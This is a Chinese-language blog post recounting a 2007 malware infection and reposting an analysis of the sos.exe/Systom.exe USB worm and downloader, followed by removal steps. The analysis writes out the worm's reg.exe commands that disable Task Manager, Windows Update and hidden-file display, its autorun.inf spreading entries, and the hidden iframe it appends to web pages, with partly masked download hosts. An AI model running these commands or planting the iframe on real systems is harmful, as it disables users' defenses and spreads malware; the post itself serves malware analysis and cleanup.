29
2007
11

病毒组团而来,我又有麻烦了

  昨晚BitDefender  Total Security2008 刚升完级让重启,我没重启,实时保护和防火墙均Disabled中,危险悄然而至,不知是那个网页,刚一打开,360就频繁报告发现木马要增加启动项、挂钩子,害的我手忙脚乱的点禁止、点卸载。硬盘狂响,赶忙禁用网卡,重新启动到安全模式,首先删除Internet 临时文件,Windows临时文件夹下的东东,然后用360Safe查流行木马、恶意插件,结果查出来有4个木马,清除掉了。查注册表,查进程。。。这时发现任务管理器被禁用,显示、隐藏文件选项也被禁用,打开WinRar,用它暂时充当资源管理器,发现C盘根目录下有个SOS.exe文件很可疑,改其扩展名为非exe。这时又发现,系统日期被改成了2000年11月29日,遂查找“修改日期为2000年11月29日”的所有文件,找到后观察“修改时间”,移动几个在中毒时间点修改的文件,Windows\Fonts文件夹下居然也让病毒做了备份。C盘检查完后,检查其余盘,发现每个盘下均有SOS.exe,基本可以确定这是个病毒文件了,先不删除它,只改掉扩展名。接着请出BitDefender进行Deep Scan,经过漫长的等等,查出病毒来了,没错就是这些文件,可恶啊!重启机子,恢复被禁用的任务管理器,显示隐藏文件选项等。恢复方法见任务管理器被禁用的解决方法显示/隐藏不可用的解决方法,上网查这几个病毒的相关信息:
U盘病毒sos.exe,systom.exe的查杀

 2007年11月12日 星期一 下午 07:28

作者:清新阳光 ( http://hi.baidu.com/newcenturysun)
日期:2007/11/11 (转载请保留此声明)

  这是一个可以通过U盘传播的感染下载者,对系统有一定的破坏作用,是之前流行的crsss.exe病毒系列的一个新变种。

File: sos.exe
Size: 26624 bytes
Modified: 2007年11月11日, 13:32:04
MD5: 6955C9DE365BEDA81390DE069D5A67F5
SHA1: 4087A6F44E81F907F0DE0FB31C15E359A90680B5
CRC32: 870BA6FE
加壳方式:upx
AV命名:Worm.Win32.Agent.yzg(瑞星)

技术细节:
1.病毒运行后,衍生如下副本:
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
在每个分区根目录下面生成auToRun.inf和Systom.exe,达到通过U盘等移动存储传播的目的。

2.调用reg.exe执行相应注册表操作:
(1)ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
添加自身启动项目

(2)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用windows自动更新

(3)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
禁用任务管理器

(4)add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t reg_dWord /d 00000000 /f
add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f
add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f
破坏显示隐藏文件的功能

(5)add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f
不显示文件的扩展名

(6)add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d
锁定主页

(7)add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
使得IE的主页设定选项不可选

3.检测带有如下字样的窗口并将其关闭
病毒
木马
检测
wpe

4.遍历所有磁盘分区删除*.gho文件,使得用户中毒后无法使用ghost恢复系统

5.遍历所有磁盘分区的INDEX.ASP,.HTM,INDEX.PHP,DEFAULT.ASP,DEFAULT.PHP,CONN.ASP文件
并在其尾部加入<IfrAmE src=http://www.*.cn/mywm/index.htm width=0 height=0></IfrAmE>的代码

6.调用IE连接网络通过http://www.*.cn/cj/tj/tj.asp进行感染统计

7.自身连接网络下载http://www.*.cn/cj/xiao.txt
http://www.*.cn/cj/table.txt
http://www.*.cn/cj/IEURL.txt
到%systemroot%\system32下面命名为h1.dll~h5.dll

三个文件均为网页文件

中毒后的sreng日志如下:
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

==================================
Autorun.inf
[C:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
[D:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
...
解决办法:
下载sreng:http://download.kztechs.com/files/sreng2.zip

启动计算机 进入
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

系统修复-Windows Shell / IE
勾选如下选项

允许在Windows 2000/XP/Server 2003中使用任务管理器
设置主页为"about:blank"
允许Internet Explorer选项窗口和选项窗口的所有内容
显示隐藏文件

然后点击“修复”按钮

2.重启计算机

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
在左边的资源管理器中单击打开系统所在盘
删除如下文件
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
%systemroot%\system32\h1.dll~h5.dll

在左边的资源管理器中单击打开每个分区
删除每个分区根目录下面的sos.exe和auToRun.inf

3.修复被感染的网页文件
推荐使用CSI的iframekill
下载地址:http://www.7747.net/Soft/200711/7948.html


   今天,同事的机器中毒了,是sos.exe.无法进入任务管理器.我首先使用了icesword结束了病毒进程.然后解决进入任务管理器的问题.实际上熟悉xp的朋友知道,可以用tasklist和taskkill来结束某些病毒进程.但操作要输入命令.太麻烦,本人觉得icesword很好.网上有下载的地方很多.使用也很方便.http://blog.cfan.com.cn/index.php/240418/action_viewspace_itemid_148459

当然瑞星卡卡,360,优化大师等都有结束任务的功能.就看你习惯什么了.

  sos.exe有人写了专杀:http://bbs.cfan.com.cn/viewthread.php?tid=641024&extra=page%3D1&frombbs=1可参考,本人解决办法是使用XDelBox1.5来在dos下删除,当然配合使用icesword和sreng来使用,具体要删除的文件要看你的经验了.

下面是解决办法.

开始-运行-gpedit.msc 进入组策略管理器 依次展开-用户配置-管理模版- 系统 双击登录/注销 里面“禁用任务管理器”

方法一:运行“Regedit”命令打开注册表编辑器,依次定位到“[HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System]”分支,在左边找到“DisableTaskMgr”项(如没有则新建,其类型为REG_DWORD),其值设置为1则禁止,为0则启用。

方法二:运行“gpedit.msc”命令打开“组策略”设置窗口,依次展开“本地计算机策略→用户配置→管理模板→系统→Ctrl+Alt+Del选项”,在右边的“删除任务管理器”的属性中,设置为“已启用”。

方法三:上面两种方法对所有用户有效,如果你想单独对某个用户设置禁用,那么可以打开C:\WINDOWS\system32目录,右键单击taskmgr.exe,选择“打开方式”菜单,在弹出的“运行身份”窗口中勾选“下列用户”,并指定一个用户即可。

摘自:http://blog.cfan.com.cn/html/18/240418_itemid_152157.html


 

一、“下载者28070”(Win32.Troj.Agent.yk.28070) 威胁级别:★★

  这是一个下载者木马病毒,会从黑客网站上下载大量其他木马病毒。病毒运行之后,在用户系统盘目录%windows%system32下生成病毒文件systom.exe和auToRun.inf。然后,它开始修改注册表。病毒首先将之前生成的systom.exe加入启动项,以便实现自动启动。随后,它继续修改注册表,禁止windows系统的自动更新、禁止显示隐藏文件、禁止系统进入安全模式。并修改系统时间为2000年,导致部分杀毒软件失效。它还会搜索电脑中已有的安全软件进行映像劫持,致使安全软件无法使用,同时,病毒检查所有磁盘,通过已经存在systom.exe利用复制的方法,在系统各盘符中生成新的AUTO病毒:auToRun.inf和nx.exe,删除所有Ghost备文件(扩展名为.GHO),感染所有的网页文件,插入黑客网站代码。这样,当用户开启网页时,会被指向到黑客指定的网站。而且,病毒还会关闭含有“杀毒“、“木马”等字样的窗口,阻止受害用户上网寻找解决它的方案(此方法和AV终结者类似)。当完全破坏了计算机的安全系统,木马便开始畅通无阻地下载木马病毒。它连接http://*****love.cn/tongji/tj.asp和http://****80.com/xx.dll两个网址,分五次下载大量的其他木马病毒以及接收木马制作者的新指令,给计算机用户造成无法估计的损失。

« 上一篇: 显示/隐藏无效的解决方法... 下一篇: 关于CLSID... »
与此文相关的文章,有兴趣就接着看看吧:

 

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。